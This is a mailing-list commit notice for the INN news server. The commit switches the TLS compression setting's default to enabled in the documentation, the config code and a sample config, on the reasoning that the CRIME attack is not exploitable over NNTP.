INN commit: trunk (4 files)

INN Commit rra at isc.org
Sat Jan 10 14:24:36 UTC 2015 

    Date: Saturday, January 10, 2015 @ 06:24:36
  Author: iulius
Revision: 9784

Enable TLS compression by default

As the CRIME attack is not exploitable in NNTP, do not disable TLS
compression by default.  No vulnerability in TLS compression is currently
known as far as NNTP is concerned.

Modified:
  trunk/doc/pod/inn.conf.pod
  trunk/doc/pod/news.pod
  trunk/lib/innconf.c
  trunk/samples/inn.conf.in

----------------------+
 doc/pod/inn.conf.pod |    5 +++--
 doc/pod/news.pod     |   12 ++++++------
 lib/innconf.c        |    2 +-
 samples/inn.conf.in  |    2 +-
 4 files changed, 11 insertions(+), 10 deletions(-)

Modified: doc/pod/inn.conf.pod
===================================================================
--- doc/pod/inn.conf.pod	2015-01-10 14:12:40 UTC (rev 9783)
+++ doc/pod/inn.conf.pod	2015-01-10 14:24:36 UTC (rev 9784)
@@ -1073,7 +1073,8 @@
 =back
 
 Finally, here are the parameters that can be used to tighten the level
-of security provided by TLS/SSL:
+of security provided by TLS/SSL in case new attacks exploitable in NNTP
+on the TLS protocol or some supported cipher suite are discovered:
 
 =over 4
 
@@ -1086,7 +1087,7 @@
 =item I<tlscompression>
 
 Whether to enable or disable SSL/TLS compression support.  This is a
-boolean and the default is false, that is to say compression is disabled.
+boolean and the default is true, that is to say compression is enabled.
 
 =item I<tlseccurve>
 

Modified: doc/pod/news.pod
===================================================================
--- doc/pod/news.pod	2015-01-10 14:12:40 UTC (rev 9783)
+++ doc/pod/news.pod	2015-01-10 14:24:36 UTC (rev 9784)
@@ -19,12 +19,12 @@
 =item *
 
 If you have been using SSL/TLS with B<nnrpd> before, be aware that the
-default value of a few F<inn.conf> parameters have changed:  SSL/TLS
-compression is now disabled by default, the server decides the preferred
-cipher, and only TLS protocols are allowed (using the flawed SSLv2
-and SSLv3 protocols is now disabled).  If you want to change these
-settings, the respective I<tlscompression>, I<tlspreferserverciphers>,
-and I<tlsprotocols> parameters can be tuned to your needs.
+default value of a few F<inn.conf> parameters have changed:  the server
+now decides the preferred cipher (instead of the client), and only TLS
+protocols are allowed (using the flawed SSLv2 and SSLv3 protocols is
+now disabled).  If you want to change these settings, the respective
+I<tlspreferserverciphers> and I<tlsprotocols> parameters can be tuned
+to your needs.
 
 =item *
 

Modified: lib/innconf.c
===================================================================
--- lib/innconf.c	2015-01-10 14:12:40 UTC (rev 9783)
+++ lib/innconf.c	2015-01-10 14:24:36 UTC (rev 9784)
@@ -233,7 +233,7 @@
     { K(tlscertfile),             STRING  (NULL) },
     { K(tlskeyfile),              STRING  (NULL) },
     { K(tlsciphers),              STRING  (NULL) },
-    { K(tlscompression),          BOOL   (false) },
+    { K(tlscompression),          BOOL    (true) },
     { K(tlseccurve),              STRING  (NULL) },
     { K(tlspreferserverciphers),  BOOL    (true) },
     { K(tlsprotocols),            LIST    (NULL) },

Modified: samples/inn.conf.in
===================================================================
--- samples/inn.conf.in	2015-01-10 14:12:40 UTC (rev 9783)
+++ samples/inn.conf.in	2015-01-10 14:24:36 UTC (rev 9784)
@@ -140,7 +140,7 @@
 #tlscertfile:                @sysconfdir@/cert.pem
 #tlskeyfile:                 @sysconfdir@/key.pem
 #tlsciphers:
-#tlscompression:             false
+#tlscompression:             true
 #tlseccurve:
 #tlspreferserverciphers:     true
 #tlsprotocols:               [ TLSv1 TLSv1.1 TLSv1.2 ]

More information about the inn-committers mailing list